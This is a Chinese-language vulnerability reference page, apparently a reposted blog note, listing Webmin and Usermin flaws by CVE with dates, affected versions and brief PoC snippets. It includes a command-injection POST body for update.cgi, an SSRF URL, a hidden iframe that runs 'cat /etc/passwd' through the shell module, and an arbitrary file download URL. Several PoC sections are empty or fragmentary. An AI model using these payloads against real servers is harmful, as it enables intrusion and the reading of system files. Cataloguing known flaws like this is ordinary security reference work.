zoukankan      html  css  js  c++  java

  • 应用安全

    简介

    开发语言
PHP

    用途
    系统管理

     

    CVE-2019-15642

    Date
    2019.7

    类型
    远程代码执行

    影响范围
    Webmin <= 1.920

    复现
    POC|EXP
    OBJECT Socket;print "Content-Type: text/plain

";$cmd='id'; print "$cmd

";
     

    分析

    反序列化导致远程代码执行

    CVE-2019-15107

    Date
2019

类型
远程代码执行
    
影响范围

    Webmin <= 1.920

    前置条件
    /password_change.cgi可访问

    复现
    POC | EXP


    
分析

    CVE-2019-12840

    Date
2019.6

类型
远程代码执行

影响范围
v 1.910

复现
    POC|EXP
    (1)
    POST: https://url/package-updates/update.cgi 
    Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
    mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
    (2)
    POST: https://url/package-updates/update.cgi 
    Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages
    

分析

    XSS vulnerability that leads to Remote Code Execution

    Date
2017

类型
XSS导致远程代码执行

影响范围
Webmin version 1.850

    前置条件
    /at/create_job.cgi可访问
     

    CSRF

    Date
2017

类型
CSRF

影响范围
Webmin version 1.850

    SSRF

    Date
2017

类型
SSRF

    影响范围
Webmin version     1.850

    复现
    POC|EXP
    https://xx.org:8443/tunnel/link.cgi/https://baidu.com

    HTML Email Command Execution Vulnerability

    Date

类型
远程命令执行

影响范围
    Usermin versions <= 1.080
    
复现
POC    |EXP
<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv
ictim&history=' height=0 width=0></iframe>

    任意文件下载

    Date
2004

类型
任意文件下载

影响范围
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0
    
前置条件
    /dansguardian/edit.cgi 可访问

复现
POC|EXP
    https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]
  • 相关阅读:
    机器学习:随机森林RF-OBB袋外错误率
    直观判断图像是否可以被实时处理
    职业:图像处理入门教程
    Caffe+Kubuntu16.04_X64+CUDA 8.0配置
    Photoshop显示RGB值问题
    统计:mAP的中文意思
    三维重建:多点透视cvSolvePNP的替代函数(Code)
    SLAM:ORB-SLAM 位姿优化描述
    MxNet : use the MxNet windows versioin
    Python 遍历目录
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/12055981.html
Copyright © 2011-2022 走看看